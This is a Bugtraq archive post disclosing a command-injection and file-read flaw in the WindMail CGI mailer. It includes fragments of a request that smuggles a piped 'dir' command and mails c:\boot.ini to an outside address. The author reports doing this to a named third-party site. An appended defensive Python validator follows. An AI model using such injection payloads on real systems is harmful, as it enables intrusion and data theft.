
Bugtraq mailing list archives

Windmail allow web user get any file
From: frankie () CNNS NET (Frankie Zie)
Date: Sat, 25 Mar 2000 22:41:46 -0000

I found some vulnerabilities when WindMail runs as a CGI
application. Tested on Windows NT 4.0, WindMail 3.05.
WindMail is a 32-bit Windows console program by Geocel that
gives you command-line e-mail messaging capability.
You can download an evaluation copy of WindMail 3.0 at:    
WindMail has a feature that allows you to mail HTML form results
from CGI scripts.
I found that WindMail doesn't check either the attachment file or
special characters in parameters, which allows you to execute
arbitrary commands that the web user can run:
20yourmail () mail com%20|%20dir%20c:\ 
After the request, WindMail will send c:\boot.ini to
yourmail () mail com and execute the "dir c:\" command.

For example:
20chinahack () 163 net
After a while, I checked chinahack () 163 net and got a copy of
boot.ini from www.metro.net
pp () cnns net
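
The two checks the post reports as missing (attachment file and special characters in parameters), as an added example that is not part of the original message or of WindMail. The attachment directory, the allowed extensions and the mailer argument order are assumptions made for illustration.

```python
import re
from pathlib import PureWindowsPath

# Assumption: the only directory the form handler may attach files from.
ATTACH_DIR = PureWindowsPath(r"C:\mailforms\outbox")
ADDRESS_RE = re.compile(r"[A-Za-z0-9._+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
ATTACH_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.(txt|csv)")
SHELL_META = set("|&;<>^%\"'`$()")


class RejectedInput(ValueError):
    """Raised when a web-supplied value must not reach the mailer."""


def check_recipient(value):
    # Name the failure explicitly so the rejection can be logged and alerted on.
    if any(ch in SHELL_META or ch.isspace() for ch in value):
        raise RejectedInput("metacharacter or whitespace in recipient")
    if not ADDRESS_RE.fullmatch(value):
        raise RejectedInput("recipient is not a plain address")
    return value


def check_attachment(name):
    path = PureWindowsPath(name)
    # A bare file name only: no drive letter, no root, no directory parts.
    if path.drive or path.root or len(path.parts) != 1:
        raise RejectedInput("attachment must be a bare file name")
    if not ATTACH_RE.fullmatch(name):
        raise RejectedInput("attachment name or extension not allowed")
    return ATTACH_DIR / name


def build_argv(mailer, recipient, attachment=None):
    # Hypothetical argument order for a command-line mailer. The list is meant
    # for subprocess.run(argv, shell=False), so no command interpreter ever
    # parses the web-supplied values.
    argv = [mailer]
    if attachment is not None:
        argv.append(str(check_attachment(attachment)))
    argv.append(check_recipient(recipient))
    return argv
```

A CGI wrapper would call `build_argv` on the decoded form fields and return an error page on `RejectedInput` instead of invoking the mailer.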
